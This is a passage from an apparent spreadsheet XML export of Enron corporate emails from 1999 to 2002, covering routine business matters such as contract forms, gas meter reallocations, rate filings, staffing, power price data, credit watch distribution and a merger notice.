We did the attached CA for NRG ("...in connection with discussions concerning _x000D_
a proposed [power generation project using a single General Electric 8EA.") _x000D_
and might be a good form for these new CA's._x000D_
_x000D_
Please advise._x000D_
_x000D_
_x000D_
_x000D_
Kathleen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 21:18:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Invitaton: An Evening of Hope and Healing</t>
  </si>
  <si>
    <t>You're invited to join community and national experts as they discuss your most pressing concerns about September 11th and the ongoing issues we face as a nation._x000D_
_x000D_
Operation Hope: Reclaiming Our Future _x000D_
One Step at a Time_x000D_
_x000D_
A cooperative community effort to provide a free evening of information, for the entire family (ages 5 and up)_x000D_
_x000D_
An evening of hope and healing and a blueprint on how to adapt to these challenging times!_x000D_
_x000D_
Sponsored by Enron _x000D_
	 _x000D_
Date:		Thursday, October 25, 2001_x000D_
Time: 		Registration from 6:15 PM - 6:50 PM_x000D_
          		Program from 7:00 PM - 9:00 PM_x000D_
Place: 	 	JW Marriott across from the Galleria on Westheimer_x000D_
_x000D_
	_x000D_
Admission is free, but by RSVP only because of limited space_x000D_
_x000D_
To RSVP and for more information, please call 713-303-3966_x000D_
Or Log On to_x000D_
www.enronoperationhope.com</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daren.farmer@enron.com', 'susan.hadix@enron.com'})</t>
  </si>
  <si>
    <t>Sep00 activity at meter # 1428</t>
  </si>
  <si>
    <t>I had to go clean up some stuff at meter # 1428 for Sep00 that will cause a _x000D_
reallocation of volumes._x000D_
_x000D_
Previously, all activity at the meter was with Beamont Methanol._x000D_
_x000D_
Now, for the period Sep 5 to Sep 18, I've entered daily transactions with _x000D_
Brandywine in Sitara # 423794_x000D_
_x000D_
Please call to discuss is any questions_x000D_
_x000D_
Lee</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 15:32:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NSTAR Std. Offer / Default Rates</t>
  </si>
  <si>
    <t>FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hendrix, Chris  _x000D_
Sent:	Tuesday, October 16, 2001 3:05 PM_x000D_
To:	Rishe, Frank_x000D_
Cc:	Hidalgo, Alex; Steffes, James D.; Taveras, Ignacio_x000D_
Subject:	NSTAR Std. Offer / Default Rates_x000D_
_x000D_
In the press releases I saw that NSTAR filed yesterday (10/15) with the DTE to decrease rates.  I have checked both the DTE and NSSTAR website but they are not posted yet.  I would like to get a copy of the NSTAR filing as soon as possible.  Enron Direct is anxious to determine the level of decrease so we can assess our product viability._x000D_
_x000D_
In addition, have you heard anything regarding WMECO making a filing to lower their rates._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 06:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>No Idea....</t>
  </si>
  <si>
    <t xml:space="preserve">OPEN IN PRIVATE_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - GREATJ~1.JPG_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 03:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL Follow up Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 05/23/2000 10:27 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Colleen Sullivan                           05/23/2000 09:05 AM_x000D_
	_x000D_
_x000D_
To: Scott Neal/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Theresa Branney/HOU/ECT@ECT, Maria Garza/HOU/ECT@ECT, Judy _x000D_
Townsend/HOU/ECT@ECT, Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, Dick _x000D_
Jenkins/HOU/ECT@ECT, Thomas Engel/HOU/ECT@ECT, Scott Mills/HOU/ECT@ECT, Jane _x000D_
M Tholt/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: EOL Follow up Meeting_x000D_
_x000D_
Please plan to attend a follow up meeting to discuss what is needed as far as _x000D_
position screens for trading transportation capacity on EOL.  The meeting _x000D_
will be at 11:30 -12:30 today, May 23, 2000, in Room 3321.  _x000D_
_x000D_
There is a NYMEX screen in this conference room, and lunch will be provided. _x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 12:50:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>selective memory maybe_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Thursday, July 26, 2001 2:48 PM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: _x000D_
_x000D_
How easily we forget - _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Thursday, July 26, 2001 2:45 PM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	RE: _x000D_
_x000D_
remind me of that bet again_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Thursday, July 26, 2001 2:40 PM_x000D_
To:	Arnold, John_x000D_
Subject:	_x000D_
_x000D_
what do you think the chance is that you come up with the us open tickets you owe me for my bet?</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 05:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: deal 555159</t>
  </si>
  <si>
    <t xml:space="preserve">Tom's in a meeting, but in his trade log he has APS crossed out and over it _x000D_
he's written Pinnacle. So I'm going to wait to find out what happened. I'll _x000D_
let you know._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/20/2001 12:46 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 555159_x000D_
_x000D_
_x000D_
_x000D_
Tom Alonso_x000D_
deal 555159_x000D_
Bloomberg shows cp as Arizona Public Service....we have Pinnacle West._x000D_
_x000D_
_x000D_
From my understanding from Rhonda trades can still be done under APS or _x000D_
Pinncale West.  Please tell him to clarify which cp with the broker as the _x000D_
trade is being done._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 09:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Believe me, I understand why you want him in your group.  But I lose Jennifer _x000D_
on Jan 24th and Chris on Jan 26th.  You have two months on one guy and six on _x000D_
the other.  I have 3 weeks on two people and Jason will be leaving soon _x000D_
because he is in the new trading track program.  I don't want to be an _x000D_
asshole, but I won't give him up unless I'm forced to._x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital Management_x000D_
	_x000D_
	From:  David Baumbach                           01/03/2001 12:41 PM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
I want Pat back in this group.  After the sale of this company, they are _x000D_
still going to make a go at having a Texas desk.  Denver is rotating in about _x000D_
6 months and Jody is rotating in two months.  I will help you find more _x000D_
talent.  What do you think?_x000D_
_x000D_
Dave_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jun 1999 02:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eleanor.fraser@enron.com'})</t>
  </si>
  <si>
    <t>Canadian utilities</t>
  </si>
  <si>
    <t>I have three utililities almost ready to go; we were sorting through issues _x000D_
related to Canadian regulated entities.  SS</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jason.sokolov@enron.com', 'tim.heizenrader@enron.com'})</t>
  </si>
  <si>
    <t>Re: CalPX prices</t>
  </si>
  <si>
    <t>Jason,_x000D_
_x000D_
I think what you may be asking for are CalISO power prices.  The CalPX is a_x000D_
scheduling coordinator and they submit balanced schedules and bid curves to_x000D_
the CalISO.  The ISO combines the curves from participating SCs (of which I_x000D_
believe Enron is one) and calculates the uncongested and congested prices. _x000D_
The CalISO prices are available from RDI PowerDat, the Enron LIM database, and_x000D_
a number of other sources.  Recent historical prices are available from the_x000D_
CalISO web site._x000D_
_x000D_
I am copying your mail to Tim Hiezenrader, who runs the Westdesk Fundamentals_x000D_
group.  I believe he would know how you might be able to access the more_x000D_
real-time CalISO data that Enron collects._x000D_
_x000D_
Tim, can you help Jason out?  He is a manager in the ENA Research Group._x000D_
_x000D_
Thanks,_x000D_
Michael_x000D_
_x000D_
&gt;&gt;&gt; Sokolov, Jason 01/26/01 02:01PM &gt;&gt;&gt;_x000D_
Michael,_x000D_
_x000D_
I an trying to locate some historical real-time (spot) power prices for CalPX._x000D_
Do you know who may have them?_x000D_
_x000D_
Jason Sokolov</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 09:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CIG/WIC RTU agreement and Gregg Contract</t>
  </si>
  <si>
    <t>Hey there guys,_x000D_
_x000D_
 Sorry to pester you, but I wanted to get an update on where you stand with _x000D_
these two (three?) agreements.  Gerald, I know I dropped off a new copy of _x000D_
the CIG/WIC agreement to allow us to install an RTU at the Lost Creek _x000D_
interconnect site.  Also, you were sent a copy of the Gregg agreement week _x000D_
before last.  Can you give me an idea of when I might be able to expect to _x000D_
hear back from you on these two items?_x000D_
_x000D_
If I am just being spacy, and you already responded on the Gregg document, _x000D_
please let me know, as I can't find anything in my e-mail.  Thanks, and I _x000D_
appreciate it._x000D_
_x000D_
Regards,_x000D_
Chris Sonneborn_x000D_
x36530</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2001 12:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: October London meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a draft of the Agenda we discussed.  Irwin - I show Joskow on _x000D_
here but he has already declined (his wife is having surgery right before our _x000D_
meeting date).  We may want to consider someone like Seabron Adamson _x000D_
(Frontier Economics) or perhaps someone else._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 03:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rory@carmelnet.com', 'camsell@pacbell.net', 'cameron@perfect.com', 'william.sellers@wright.edu', 'psellers@haas.berkeley.edu', 'psellers@pacbell.net', 'devans@napanet.net', 'nancy.sellers@mondavi.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>Visionary Keynotes</t>
  </si>
  <si>
    <t>Look at who=01,s doing Visionary Keynotes._x000D_
_x000D_
?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Seybold Seminars [mailto:SeyboldSeminars@events.key3media.com]_x000D_
Sent: Tuesday, March 13, 2001 10:28 AM_x000D_
To: eldon@interx.net_x000D_
Subject: Register for a FREE Expo Pass-A $75 Value!_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
masthead_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
Experience 80,000 Square Feet of Media Technology with your FREE Expo Pass =_x000D_
to=20_x000D_
Seybold Seminars Boston_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
We're excited about all we have to offer you at Seybold Seminars Boston=20_x000D_
2001--one of the largest displays of media technology ever assembled! Join=_x000D_
=20_x000D_
hundreds of vendors who'll be showcasing their products and services at thi=_x000D_
s=20_x000D_
leading cross-media Expo.=20_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
expoflr_x000D_
_x000D_
_x000D_
REGISTER NOW_x000D_
for your FREE=20_x000D_
Expo pass=20_x000D_
worth $75._x000D_
Use priority code EMA2.=20_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
EXPO FLOOR HIGHLIGHTS_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
NEW! Digital Media Zone_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
E-Content Management Solutions Showcase_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
NEW! Meet the Dream Team_x000D_
David Carson_x000D_
Clement Mok_x000D_
Roger Black_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
IDEAlliance XML in Publishing Showcase_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
And more!_x000D_
_x000D_
_x000D_
_x000D_
photos_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
NEW! Digital Art Gallery_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
UNPARALLELED EDUCATION_x000D_
Enhance your knowledge and skills--attend critical information-packed=20_x000D_
educational sessions covering:_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
Web strategies and design_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
Media technologies_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
Print publishing developments_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
Content management_x000D_
_x000D_
_x000D_
=01=07_x000D_
_x000D_
_x000D_
Digital media--NEW!_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
Choose from discount packages, individual Conferences, tutorials and Specia=_x000D_
l=20_x000D_
Interest Days to customize your schedule. Visit our Web site for more=20_x000D_
information and a full schedule of educational offerings.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
VISIONARY KEYNOTES_x000D_
Christie Hefner, Playboy Enterprises, Inc._x000D_
Fred Ebrahimi, Quark, Inc._x000D_
And more!_x000D_
_x000D_
For the full schedule of keynotes, visit our Web site,=20_x000D_
www.seyboldseminars.com_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
REGISTER TODAY._x000D_
Use priority code EMA2 to register and receive your FREE Exposition Pass!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
footer_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
You are receiving this email because you have participated in a Key3Media=_x000D_
=20_x000D_
event or have indicated that you are open to receiving event updates via=20_x000D_
eldon@interx.net. If you do not wish to receive future updates, please clic=_x000D_
k=20_x000D_
here and your address will be removed._x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 04:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'diana.parker@enron.com'})</t>
  </si>
  <si>
    <t>FSA Consent and Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are the consent &amp; agreements required by OPIC with respect to the _x000D_
Fuel Supply Agreement and Guaranty for Puerto Quetzal.  These were drafted by _x000D_
OPIC's counsel, and were marked up by PQP counsel, as reflected on the _x000D_
attachments.  Please let me know at your earliest opportunity if you have any _x000D_
comments/issues with respect to the attachments._x000D_
_x000D_
Thanks,_x000D_
Diana_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Miss me?  Apparently not - no hugs from you.  Who is doing my Market area _x000D_
stuff and why didn't Alicia tell me she was leaving??  I guess we aren't the _x000D_
item I thought we wuz.</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 13:23:20 -0800 (PST)</t>
  </si>
  <si>
    <t>Texas A&amp;M University - News Flash</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
 _x000D_
 http://www.tamu.edu/aggiedaily/press/</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 11:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: are you available tomorrow at 10 CST to fill Vicki in on the PE_x000D_
 Credit issue?</t>
  </si>
  <si>
    <t xml:space="preserve">Vicki must be tired of me being the perpetual bearer of bad tidings... _x000D_
_x000D_
You bet.  You want to call me at my office?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Robert C Williams/ENRON@enronXgate_x000D_
	04/24/2001 06:05 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: are you available tomorrow at 10 CST to fill Vicki in on the PE _x000D_
Credit issue?  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 02:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.schwieger@enron.com', 'susan.smith@enron.com', 'paul.choi@enron.com', 'steve.schneider@enron.com', 'kate.fraser@enron.com', 'souad.mahmassani@enron.com', 'james.barker@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'brad.coleman@enron.com', 'joseph.graham@enron.com', 'brad.mckay@enron.com', 'justin.rostant@enron.com', 'dan.mccairns@enron.com', 'lisa.csikos@enron.com', 'kristen.hanson@enron.com', 'melissa.graves@enron.com', 'larry.cash@enron.com', 'shonnie.daniel@enron.com', 'brad.horn@enron.com', 'mark.taylor@enron.com', 'matthew.fleming@enron.com', 'charles.otto@enron.com', 'colleen.sullivan@enron.com', 'greg.brazaitis@enron.com', 'jay.knoblauh@enron.com', 'daniel.diamond@enron.com', 'isabel.resendez@enron.com', 'andrew.conner@enron.com', 'kyle.schultz@enron.com', 'gerald.nemec@enron.com', 'vance.taylor@enron.com', 'ina.rangel@enron.com', 'sara.shackleton@enron.com', 'harold.bertram@enron.com', 'susan.pereira@enron.com', 'alicia.jones@enron.com', 'debbie.brackett@enron.com', 'andrew.greer@enron.com', 'thomas.martin@enron.com', 'jane.tholt@enron.com', 'mary.smith@enron.com', 'steven.south@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'mary.cook@enron.com', 'nicole.cortez@enron.com', 'bob.shults@enron.com', 'marde.driscoll@enron.com', 'lucy.ortiz@enron.com', 'sandi.braband@enron.com', 'andrew.lewis@enron.com', 'julie.gomez@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'edward.baughman@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'ned.higgins@enron.com', 'kim.theriot@enron.com', 'homer.lin@enron.com', 'michael.etringer@enron.com', 'andrea.ring@enron.com', 'jefferson.sorenson@enron.com', 'barbara.gray@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'gary.bryan@enron.com', 'cynthia.gin@enron.com', 'david.fairley@enron.com', 'harry.bucalo@enron.com', 'jeffrey.shankman@enron.com', 'gary.lamphier@enron.com', 'mike.grigsby@enron.com', 'barend.vanderhorst@enron.com', 'phillip.allen@enron.com', 'gregory.schockling@enron.com', 'timothy.ray@enron.com', 'john.taylor@enron.com', 'robert.shiring@enron.com', 'shawna.flynn@enron.com', 'william.stuart@enron.com', 'chris.foster@enron.com', 'nichole.gunter@enron.com', 'david.parquet@enron.com', 'george.smith@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'steve.hooser@enron.com', 'lisa.gillette@enron.com', 'peter.keavey@enron.com', 'tammi.depaolis@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'teresa.mandola@enron.com', 'joanie.ngo@enron.com', 'jake.thomas@enron.com', 'david.eubanks@enron.com', 'jeffrey.austin@enron.com', 'patrick.hanse@enron.com', 'dick.jenkins@enron.com', 'lance.halgren@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'donald.black@enron.com', 'janet.dietrich@enron.com', 'katherine.herrera@enron.com', 'keith.holst@enron.com', 'george.gilbert@enron.com', 'peggy.banczak@enron.com', 'bryan.hull@enron.com', 'angie.collins@enron.com', 'steve.neal@enron.com', 'eric.gillaspie@enron.com', 'beth.perlman@enron.com', 'marc.horowitz@enron.com', 'kevin.bosse@enron.com', 'janelle.scheuer@enron.com', 'john.singer@enron.com', 'thresa.allen@enron.com', 'lee.papayoti@enron.com', 'stacy.dickson@enron.com', 'drew.hill@enron.com', 'brent.price@enron.com', 'mark.courtney@enron.com', 'robert.walker@enron.com', 'robert.cotten@enron.com', 'sheetal.patel@enron.com', 'james.ducote@enron.com', 'brian.riley@enron.com', 'cary.carrabine@enron.com', 'linda.ewing@enron.com', 'rebecca.ford@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'beth.cowan@enron.com', 'daniel.reck@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'bo.petersen@enron.com', 'mike.miller@enron.com', 'greg.mcclendon@enron.com', 'sheila.glover@enron.com', 'stuart.staley@enron.com', 'sunil.dalal@enron.com', 'kyle.lilly@enron.com', 'lisa.lees@enron.com', 'andrea.hauser@enron.com', 'ann.white@enron.com', 'suzy.robey@enron.com', 'kimberly.olinger@enron.com', 'adam.gross@enron.com', 'bob.schorr@enron.com', 'elizabeth.sager@enron.com', 'fred.lagrasta@enron.com', 'james.shirley@enron.com', 'ed.smith@enron.com', 'winston.cheng@enron.com', 'john.grass@enron.com', 'tom.donohoe@enron.com', 'george.hope@enron.com', 'eva.pao@enron.com', 'paul.lucci@enron.com', 'monica.roberts@enron.com', 'jung-suk.suh@enron.com', 'kelly.lovvorn@enron.com', 'dianne.swiber@enron.com', 'tana.jones@enron.com', 'tina.valadez@enron.com', 'ragan.bond@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', "brian.o'rourke@enron.com", 'carol.clair@enron.com', 'maureen.smith@enron.com', 'ray.hamman@enron.com', 'leslie.reeves@enron.com', 'greg.wolfe@enron.com', 'edward.gottlob@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--7/31/00</t>
  </si>
  <si>
    <t xml:space="preserve">               Attached is a newly revised Credit Watch listing.  If there _x000D_
are any personnel in your group that were not included in this distribution, _x000D_
please insure that they receive a copy of this report._x000D_
_x000D_
To add additional people to this distribution, or if this report has been _x000D_
sent to you in error, please contact Veronica Espinoza at x6-6002._x000D_
_x000D_
For other questions, please contact Bill Bradford at x3-3831, Russell Diamond _x000D_
at 5-7095, Brant Reves at x3-9897, Veronica Espinoza at x6-6002 or the Global _x000D_
Credit Hotline at x3-1803._x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Dec 1999 07:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Emission trading</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/17/99 _x000D_
03:15 PM ---------------------------_x000D_
_x000D_
_x000D_
Joseph Hrgovcic_x000D_
12/16/99 09:46 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Emission trading  _x000D_
_x000D_
Vince,_x000D_
_x000D_
 I spoke with Susan Wood, who heads up our emissions marketing effort who _x000D_
says we don't really have any materials we send out. She did recommend the _x000D_
Emissions trading handbook which can be purchased for $50 from _x000D_
http://www.etei.org/handbook_changed.htm. _x000D_
_x000D_
 In general, the site http://www.etei.org/ is a great source of info, and the _x000D_
the parent site, http://www.emissions.org should be checked out as well. If _x000D_
you'd like me to purchase the handbook (it will take three weeks) let me know._x000D_
_x000D_
Joe_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
12/16/99 08:15 AM_x000D_
To: Joseph Hrgovcic/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: Emission trading_x000D_
_x000D_
Joe,_x000D_
_x000D_
Do we have any materials about it?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/16/99 _x000D_
08:14 AM ---------------------------_x000D_
_x000D_
_x000D_
Adam Brulinski_x000D_
12/14/99 08:22 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Emission trading  _x000D_
_x000D_
Thank you in advance. _x000D_
_x000D_
Let me just mention that the issue is quite urgent so I would appreciate if I _x000D_
could get sth ASAP._x000D_
_x000D_
Adam_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
99-12-14 15:24_x000D_
To: Adam Brulinski/WAR/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Emission trading  _x000D_
_x000D_
Adam,_x000D_
_x000D_
Let me gather some information for you._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
Adam Brulinski_x000D_
12/14/99 08:08 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Emission trading_x000D_
_x000D_
Szanowny Panie,_x000D_
_x000D_
Chcielibysmy zaczac propagowac w Polsce idee handlu prawami do emisji _x000D_
zanieczyszczen. Dlatego tez prosilbym o przeslanie, najlepiej droga emailowa _x000D_
materialow dotyczacych tej koncepji - glownie chodzi mi o strone _x000D_
"merytoryczna"._x000D_
_x000D_
Z powazaniem,_x000D_
_x000D_
Adam Brulinski_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 09:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.lavorato@enron.com', 'tim.belden@enron.com', 'david.delainey@enron.com', 'mark.frevert@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>June 1 meeting between ENA and Government Affairs: Wholesale power_x000D_
 markets : Principles and Strategies</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached a memo and powerpoint  presentation that memorializes _x000D_
the above-refrenced meeting. I would ask that Kevin and Tim forward this on _x000D_
to everyone in their group who should see it- we did'nt have a good list of _x000D_
names. Thanks and feel ree to call if you have any questions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 08:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: merging of Koch Energy Trading and Entergy Power Marketing</t>
  </si>
  <si>
    <t xml:space="preserve">Anthony,_x000D_
_x000D_
I just spoke to the Entergy lawyer, and this merger isn't effective until _x000D_
2/1/01.  She will be sending me documents when they are filed with the _x000D_
Delaware Secretary of State.  So you don't need to worry about this._x000D_
_x000D_
_x000D_
_x000D_
	Anthony Campos_x000D_
	01/18/2001 02:52 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: merging of Koch Energy Trading and Entergy Power Marketing_x000D_
_x000D_
FYI_x000D_
_x000D_
---------------------- Forwarded by Anthony Campos/HOU/ECT on 01/18/2001 _x000D_
02:48 PM ---------------------------_x000D_
From: Karen Lambert on 01/18/2001 01:41 PM_x000D_
To: Cheryl Johnson/Corp/Enron@Enron, Marilyn Colbert/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect, Samuel Schott/HOU/ECT@ECT, Adnan Patel/Corp/Enron@ENRON, _x000D_
Mary G Gosnell/HOU/ECT@ECT_x000D_
cc: Kim S Theriot/HOU/ECT@ECT, Matthew Allan/LON/ECT@ECT, Amelia _x000D_
Alland/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT, Enron Europe Global Contracts _x000D_
and Facilities, Dianne Seib/CAL/ECT@ECT, Cyndie _x000D_
Balfour-Flanagan/Corp/Enron@ENRON, Martha Stevens/HOU/ECT@ECT, Sarah _x000D_
Smith/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Molly Lafuze/Enron _x000D_
Communications@ENRON COMMUNICATIONS@ENRON, Molly.Lafuze@enron.net, Alexia _x000D_
Gonzales/HOU/ECT@ECT, Stephen Furter/LON/ECT@ECT, Andrew Wells/LON/ECT@ECT, _x000D_
Michelle Schultz/NA/Enron@ENRON, cbalfou@enron.com, Laurie _x000D_
Lee/NA/Enron@Enron, Marlene Hilliard/HOU/ECT@ect, Rhonda L _x000D_
Denton/HOU/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT, Peggy _x000D_
Hedstrom/CAL/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Cheryl _x000D_
Dudley/HOU/ECT@ECT, Gina LaVallee/CAL/ECT@ECT, James Scully/HOU/ECT@ECT, _x000D_
Susan Elledge/NA/Enron@Enron, Linda K Loukanis/HOU/ECT@ECT, Danny Clark/Enron _x000D_
Communications@Enron Communications, Amy Heffernan/Enron Communications@Enron _x000D_
Communications, Gail Hill/LON/ECT@ECT, Charlie Hoang/HOU/ECT@ECT, Matilda _x000D_
Machado/CAL/ECT@ECT, Jefferson D Sorenson/HOU/ECT@ECT, Georgi _x000D_
